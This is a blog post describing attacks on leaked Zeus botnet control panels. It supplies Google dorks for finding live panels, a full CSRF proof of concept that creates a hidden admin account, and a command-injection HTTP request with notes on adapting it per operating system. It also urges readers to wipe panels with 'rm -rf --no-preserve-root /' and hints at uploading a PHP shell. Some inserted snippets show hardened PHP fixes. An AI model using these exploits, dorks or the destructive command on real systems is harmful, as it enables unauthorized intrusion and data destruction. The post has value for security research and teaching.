Friday, January 26, 2024

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html>
<head>
    <title></title>
</head>
<body>
    <pre>
  This is a CSRF POC to create a new admin user in Zeus admin panels.
  Username: user_1392719246 Password: admin1
  You might change the URL from 127.0.0.1.
  Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.
    </pre>
    <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>
    <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">
        <input name="name" type="hidden" value="user_1392719246" />
        <input name="password" type="hidden" value="admin1" />
        <input name="status" type="hidden" value="1" />
        <input name="comment" type="hidden" value="PWND!" />
        <input name="r_botnet_bots" type="hidden" value="1" />
        <input name="r_botnet_scripts" type="hidden" value="1" />
        <input name="r_botnet_scripts_edit" type="hidden" value="1" />
        <input name="r_edit_bots" type="hidden" value="1" />
        <input name="r_reports_db" type="hidden" value="1" />
        <input name="r_reports_db_edit" type="hidden" value="1" />
        <input name="r_reports_files" type="hidden" value="1" />
        <input name="r_reports_files_edit" type="hidden" value="1" />
        <input name="r_reports_jn" type="hidden" value="1" />
        <input name="r_stats_main" type="hidden" value="1" />
        <input name="r_stats_main_reset" type="hidden" value="1" />
        <input name="r_stats_os" type="hidden" value="1" />
        <input name="r_system_info" type="hidden" value="1" />
        <input name="r_system_options" type="hidden" value="1" />
        <input name="r_system_user" type="hidden" value="1" />
        <input name="r_system_users" type="hidden" value="1" />
    </form>
    <script type="text/javascript">
        window.onload = function() {
            var counter = 10;
            var interval = setInterval(function() {
                counter--;
                document.getElementById('countdown').innerHTML = counter;
                if (counter == 0) {
                    redirect();
                    clearInterval(interval);
                }
            }, 1000);
        };

        function redirect() {
            document.getElementById("csrf-form").submit();
        }
    </script>
</body>
</html>
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although string concatenation is used instead of parameterized queries, with addslashes for escaping, the integers are always quoted. This means it can only be exploited with a special multibyte encoding like GB/Big5, which is pretty unlikely.
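A remember-me design that keeps password material out of the cookie, as an added example (not the panel's code): the cookie carries a random selector and validator, the server stores only a hash of the validator, and the $store array stands in for the panel's MySQL table. The password itself would go through password_hash() instead of MD5, which is a one-line change and is not shown.

```php
<?php
// Added example, not from the Zeus panel: a remember-me cookie that carries a
// random token instead of md5(password)/md5(username). A stolen cookie (XSS,
// shared machine) then yields a revocable token, not password material, and
// the server keeps only a hash of the secret half. $store stands in for the
// panel's MySQL table (assumed; keyed by selector).

// Issue a cookie value "selector:validator": the selector finds the row, the
// validator is the secret; only sha256(validator) is stored server-side.
function rememberMeIssue(int $userId, array &$store, int $ttl = 30 * 86400): string
{
    $selector  = bin2hex(random_bytes(12));
    $validator = bin2hex(random_bytes(32));
    $store[$selector] = [
        'user_id' => $userId,
        'hash'    => hash('sha256', $validator),
        'expires' => time() + $ttl,
    ];
    return $selector . ':' . $validator;
}

// Verify a cookie value; returns the user id, or null when it is malformed,
// unknown, expired or forged. hash_equals() keeps the comparison constant-time,
// and a wrong validator for a known selector revokes that token outright.
function rememberMeVerify(string $cookie, array &$store): ?int
{
    $parts = explode(':', $cookie, 2);
    if (count($parts) !== 2 || !isset($store[$parts[0]])) {
        return null;
    }
    $row = $store[$parts[0]];
    if ($row['expires'] < time() || !hash_equals($row['hash'], hash('sha256', $parts[1]))) {
        unset($store[$parts[0]]);
        return null;
    }
    return $row['user_id'];
}

// Logout or password change: drop every token of that user.
function rememberMeRevokeAll(int $userId, array &$store): void
{
    foreach ($store as $selector => $row) {
        if ($row['user_id'] === $userId) {
            unset($store[$selector]);
        }
    }
}
```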

What's good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere:
        return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject a malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){
    ...
    $archive .= '.zip';
    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';
    exec($cli, $e, $r);
}

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1

The || works because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.
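A hardened form of fsarcCreate(), as an added example and not the panel's own code: it uses escapeshellarg(), the per-argument counterpart of the escapeshellcmd() recommended above, so every file name reaches zip as one literal argument. The $reportsDir base directory and the containment check are assumptions about the panel's layout, not something the original code does.

```php
<?php
// Added example, not the Zeus panel's own code: a hardened fsarcCreate().
// The original concatenates $archive and $files into one command string,
// so a file name such as  files"||ping -n 10 127.0.0.1  closes the quote and
// the shell runs ping. escapeshellarg() quotes each argument on its own, so
// the shell passes even that name to zip as a single literal argument.
// $reportsDir is an assumed base directory; the real panel's layout may differ.
function fsarcCreateSafe(string $reportsDir, string $archive, array $files): bool
{
    $base = realpath($reportsDir);
    if ($base === false) {
        return false;
    }

    $args = [];
    foreach ($files as $file) {
        // Reject non-strings and NUL bytes before touching the filesystem.
        if (!is_string($file) || strpos($file, "\0") !== false) {
            return false;
        }
        // Extra check beyond quoting: resolve the name and refuse anything that
        // does not live under the reports directory (blocks "../" as well).
        $path = realpath($base . DIRECTORY_SEPARATOR . $file);
        if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
            return false;
        }
        $args[] = escapeshellarg($path);
    }
    if ($args === []) {
        return false;
    }

    // The archive name is quoted too: no user-controlled byte reaches the shell unquoted.
    $cli = 'zip -r -9 -q -S ' . escapeshellarg($archive . '.zip') . ' ' . implode(' ', $args);
    exec($cli, $output, $status);
    return $status === 0;
}
```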

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like gate.php is worth investigating if you know the RC4 key. You can upload a PHP shell :)